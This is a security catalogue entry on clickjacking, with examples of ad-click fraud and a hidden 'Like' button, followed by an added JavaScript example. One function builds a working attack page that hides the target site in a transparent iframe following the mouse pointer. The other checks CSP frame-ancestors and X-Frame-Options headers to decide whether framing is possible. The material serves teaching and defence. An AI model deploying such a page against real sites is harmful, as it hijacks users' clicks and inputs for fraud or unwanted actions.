T 5.175 Clickjacking
In a clickjacking attack, parts of a website are covered while it is displayed: transparent layers that the user cannot see are superimposed on the visible website content.
Any content or controls can be integrated into these transparent layers without being visible to the user. If the user clicks on what appears to be the website's own content, the click is not delivered to the visible layer but to the superimposed layer, and is therefore hijacked. The name clickjacking combines the words click and jacking (from hijacking).
Along with mouse clicks, keyboard input can also be diverted to third-party servers with the help of transparently displayed text boxes (e.g. positioned over password fields).
Examples:
- An attacker participates in an advertising scheme in which the commission is determined by the number of clicks users make (click remuneration or pay-per-click). He superimposes part of the web application with an invisible link to the advertisement, so that users click the advertisement without noticing it. This increases the number of clicks and therefore the commission paid out.
- An attacker places an invisible "Like" button for his/her own Facebook page on a website, positioned so that it always follows the mouse pointer. The user cannot discern this. Wherever the user clicks on the site, Facebook's "Like" function is executed and the user's Facebook data is sent to the attacker, who can exploit it further.
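The following is an added example; it is not part of the catalogue entry. It shows both sides of the mechanism described above in JavaScript: `buildClickjackPage` produces the kind of page an attacker would serve (a decoy with the target site loaded in a fully transparent iframe that follows the mouse pointer, as in the "Like" button example), and `framingAllowed` is the check a defender wants, i.e. whether a target's response headers (Content-Security-Policy `frame-ancestors`, falling back to `X-Frame-Options`) let a given origin frame it at all. The origins, URLs and header values used are constructed for illustration; the source-expression matching implements the common cases of the CSP matching rules and is a simplification.

```javascript
// Added example: attacker page for clickjacking, and a header check telling a
// defender whether an attacker origin may frame the target. Origins and headers
// below are constructed for illustration.

// --- Attack side ------------------------------------------------------------
// The target (e.g. a page with a "Like" or "Buy" button) is loaded in an iframe
// that is stacked above a decoy (z-index) but invisible (opacity: 0). The click
// goes to the topmost element, i.e. into the framed site. A mousemove handler
// keeps the frame under the pointer; once the pointer is over the frame the
// parent stops receiving events, which is exactly the state the attacker wants.
function buildClickjackPage(targetUrl) {
  return `<!doctype html><html><head><style>
  body { margin: 0; }
  #decoy { position: absolute; top: 120px; left: 120px; }
  #victim { position: absolute; width: 300px; height: 100px; opacity: 0; z-index: 10; border: 0; }
</style></head><body>
  <div id="decoy"><button>Click here to claim your prize</button></div>
  <iframe id="victim" src="${targetUrl}"></iframe>
  <script>
    document.addEventListener('mousemove', (e) => {
      const f = document.getElementById('victim');
      f.style.left = (e.pageX - 150) + 'px';   // centre the 300x100 frame on the pointer
      f.style.top  = (e.pageY - 50) + 'px';
    });
  </script></body></html>`;
}

// --- Defender side ----------------------------------------------------------
// headers: { 'Header-Name': 'value' | ['value', ...] } as returned by an HTTP client.
function headerValues(headers, name) {
  const out = [];
  for (const [k, v] of Object.entries(headers)) {
    if (k.toLowerCase() !== name) continue;
    for (const item of Array.isArray(v) ? v : [v]) out.push(String(item));
  }
  return out;
}

const defaultPort = (protocol) => (protocol === 'https:' ? '443' : protocol === 'http:' ? '80' : '');

// Parse one CSP policy into directive-name -> [source expressions]; first occurrence wins.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && !directives.has(tokens[0].toLowerCase())) {
      directives.set(tokens[0].toLowerCase(), tokens.slice(1));
    }
  }
  return directives;
}

// Match a frame-ancestors source expression ('none', 'self', scheme source, host source)
// against the framing origin. `self` is the target's own origin.
function sourceMatches(expr, ancestor, self) {
  const e = expr.toLowerCase();
  if (e === "'none'") return false;
  if (e === "'self'") return ancestor.origin === self.origin;
  if (e === '*') return true;
  if (/^[a-z][a-z0-9+.\-]*:$/.test(e)) return ancestor.protocol === e;     // e.g. https:
  const m = /^(?:([a-z][a-z0-9+.\-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\d+|\*))?$/.exec(e);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme) {
    if (ancestor.protocol !== scheme + ':') return false;
  } else if (ancestor.protocol !== self.protocol &&
             !(self.protocol === 'http:' && ancestor.protocol === 'https:')) {
    return false;                      // scheme-less source: same scheme, or http -> https upgrade
  }
  if (wildcard ? !ancestor.hostname.endsWith('.' + host) : ancestor.hostname !== host) return false;
  const ancPort = ancestor.port || defaultPort(ancestor.protocol);
  if (port && port !== '*') return port === ancPort;
  return ancPort === defaultPort(ancestor.protocol);   // no port given: default port only
}

// May `ancestorOrigin` embed `targetOrigin` in a frame, given the target's response headers?
function framingAllowed(headers, ancestorOrigin, targetOrigin) {
  const ancestor = new URL(ancestorOrigin);
  const self = new URL(targetOrigin);
  // 1. Enforced CSP (Report-Only does not block). Every delivered policy must allow the
  //    ancestor; once any policy carries frame-ancestors, X-Frame-Options is ignored.
  let sawFrameAncestors = false;
  for (const value of headerValues(headers, 'content-security-policy')) {
    for (const policy of value.split(',')) {                  // one header, several policies
      const sources = parseCsp(policy).get('frame-ancestors');
      if (sources === undefined) continue;
      sawFrameAncestors = true;
      if (!sources.some((s) => sourceMatches(s, ancestor, self))) return false;
    }
  }
  if (sawFrameAncestors) return true;
  // 2. X-Frame-Options fallback. Conflicting values are treated as DENY by browsers; unknown
  //    values, including the obsolete ALLOW-FROM, are ignored and therefore give no protection.
  const xfo = headerValues(headers, 'x-frame-options')
    .flatMap((v) => v.split(',')).map((v) => v.trim().toLowerCase()).filter(Boolean);
  if (xfo.length === 0) return true;
  if (new Set(xfo).size > 1) return false;
  if (xfo[0] === 'deny') return false;
  if (xfo[0] === 'sameorigin') return ancestor.origin === self.origin;
  return true;
}
```

The check is deliberately conservative in the attacker's favour: a target that sends only `X-Frame-Options: ALLOW-FROM ...`, a misspelt value, or a policy in the Report-Only header is reported as frameable, because that is how current browsers treat it. `frame-ancestors` without any source, or with `'none'`, blocks all framing.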